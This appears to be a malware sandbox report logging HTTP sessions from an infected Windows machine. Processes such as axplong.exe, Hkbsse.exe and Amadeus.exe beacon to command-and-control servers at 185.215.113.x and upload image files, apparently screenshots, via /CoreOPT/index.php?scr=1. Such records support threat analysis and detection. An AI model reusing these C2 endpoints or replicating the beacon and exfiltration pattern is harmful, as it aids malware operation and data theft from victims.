Aug 31, 2024 15:45:03.452294111 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:03.700859070 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:03 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.5	49761	185.215.113.26	80	5976	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:03.639666080 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:04.371233940 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:04.893174887 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:05.143517971 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.5	49762	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:04.023612976 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:04.759783983 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:04 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:04.906692982 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:05.158752918 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.5	49763	185.215.113.26	80	5976	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:05.273821115 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:06.024445057 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:06.213846922 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:06.465641975 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.5	49764	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:05.334203959 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:06.076559067 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:06.214241982 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:06.462230921 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.5	49766	185.215.113.19	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:05.548505068 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----ODk5OTA= Host: 185.215.113.19 Content-Length: 90142 Cache-Control: no-cache
Aug 31, 2024 15:45:05.548563957 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 44 6b 35 4f 54 41 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------ODk5OTA=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:45:05.548609018 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:45:05.548609018 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:45:05.548639059 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:45:05.548666954 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 15:45:05.548666954 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:45:05.548702955 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:45:05.548726082 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:45:05.548754930 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:45:05.548754930 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:45:08.998644114 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
37	192.168.2.5	49767	185.215.113.26	80	5976	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:08.445662975 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:09.250979900 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:09.286021948 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:09.538296938 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
38	192.168.2.5	49768	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:08.445816040 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:09.258898020 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
39	192.168.2.5	49770	185.215.113.16	80	6664	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:09.743335962 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:10.491242886 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
40	192.168.2.5	49771	185.215.113.26	80	5976	C:\Users\user\AppData\Local\Temp\054fdc5f70\Hkbsse.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:09.779707909 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:10.506417036 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:10.535149097 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:10.793807030 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
41	192.168.2.5	49772	185.215.113.19	80	1652	C:\Users\user\1000238002\Amadeus.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:09.846904039 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTIzMzE= Host: 185.215.113.19 Content-Length: 92483 Cache-Control: no-cache
Aug 31, 2024 15:45:09.846904039 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 49 7a 4d 7a 45 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTIzMzE=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:45:09.846959114 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:45:09.846982002 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:45:09.847007990 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:45:09.847309113 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
Aug 31, 2024 15:45:09.847346067 CEST	6	OUT	Data Raw: 00 60 00 00 Data Ascii: `
Aug 31, 2024 15:45:09.847346067 CEST	6	OUT	Data Raw: ff db 00 43 Data Ascii: C
Aug 31, 2024 15:45:09.847392082 CEST	6	OUT	Data Raw: 00 08 06 06 Data Ascii:
Aug 31, 2024 15:45:09.847392082 CEST	6	OUT	Data Raw: 07 06 05 08 Data Ascii:
Aug 31, 2024 15:45:09.847424030 CEST	6	OUT	Data Raw: 07 07 07 09 Data Ascii:
Aug 31, 2024 15:45:11.254415989 CEST	190	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.5	49773	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:10.728837967 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:11.478144884 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.5	49774	185.215.113.26	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:10.919375896 CEST	155	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Aug 31, 2024 15:45:11.662743092 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Aug 31, 2024 15:45:11.681864023 CEST	309	OUT	POST /Dem7kTu/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.26 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 37 43 33 44 46 33 39 43 32 30 32 39 34 34 33 31 37 36 39 45 44 39 36 38 45 38 33 46 43 42 37 42 36 37 35 30 44 36 43 37 41 43 42 32 32 30 37 32 34 39 42 38 43 43 38 32 43 30 34 38 46 42 44 36 36 32 35 39 35 38 36 46 30 46 32 31 45 41 37 34 38 36 39 41 43 35 38 39 38 33 42 35 45 34 44 43 39 46 45 31 36 41 35 44 43 45 41 46 34 41 37 38 30 33 38 43 39 30 39 31 35 30 32 31 43 30 37 38 34 44 37 31 44 39 44 30 34 33 31 32 31 43 43 46 36 35 44 37 38 38 35 37 43 Data Ascii: r=A7C3DF39C20294431769ED968E83FCB7B6750D6C7ACB2207249B8CC82C048FBD66259586F0F21EA74869AC58983B5E4DC9FE16A5DCEAF4A78038C90915021C0784D71D9D043121CCF65D78857C
Aug 31, 2024 15:45:11.933974028 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
44	192.168.2.5	49775	185.215.113.19	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:11.099874020 CEST	183	OUT	POST /CoreOPT/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.19 Content-Length: 31 Cache-Control: no-cache Data Raw: 64 31 3d 31 30 30 30 32 36 34 30 32 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39 Data Ascii: d1=1000264021&unit=246122658369
Aug 31, 2024 15:45:11.958728075 CEST	193	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 4 <c>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
45	192.168.2.5	49776	185.215.113.16	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:11.543335915 CEST	310	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 156 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 36 46 44 41 34 34 34 43 45 46 43 46 44 33 33 43 32 30 44 42 46 42 30 30 36 31 36 35 42 37 30 33 31 38 42 42 43 30 30 36 35 43 30 44 35 41 39 35 39 36 37 44 46 34 41 30 36 30 33 33 32 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6C6FDA444CEFCFD33C20DBFB006165B70318BBC0065C0D5A95967DF4A060332
Aug 31, 2024 15:45:12.285381079 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Sat, 31 Aug 2024 13:45:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port
46	192.168.2.5	49777	185.215.113.19	80

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 15:45:11.609281063 CEST	170	OUT	POST /CoreOPT/index.php?scr=1 HTTP/1.1 Content-Type: multipart/form-data; boundary=----OTEwMTQ= Host: 185.215.113.19 Content-Length: 91166 Cache-Control: no-cache
Aug 31, 2024 15:45:11.609281063 CEST	132	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 4f 54 45 77 4d 54 51 3d 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 64 61 74 61 22 3b 20 66 69 6c 65 6e 61 6d 65 3d 22 32 34 36 31 32 32 36 35 38 33 36 Data Ascii: ------OTEwMTQ=Content-Disposition: form-data; name="data"; filename="246122658369.jpg"Content-Type: application/octet-stream
Aug 31, 2024 15:45:11.609281063 CEST	6	OUT	Data Raw: ff d8 ff e0 Data Ascii:
Aug 31, 2024 15:45:11.609358072 CEST	6	OUT	Data Raw: 00 10 4a 46 Data Ascii: JF
Aug 31, 2024 15:45:11.609358072 CEST	6	OUT	Data Raw: 49 46 00 01 Data Ascii: IF
Aug 31, 2024 15:45:11.609358072 CEST	6	OUT	Data Raw: 01 01 00 60 Data Ascii: `
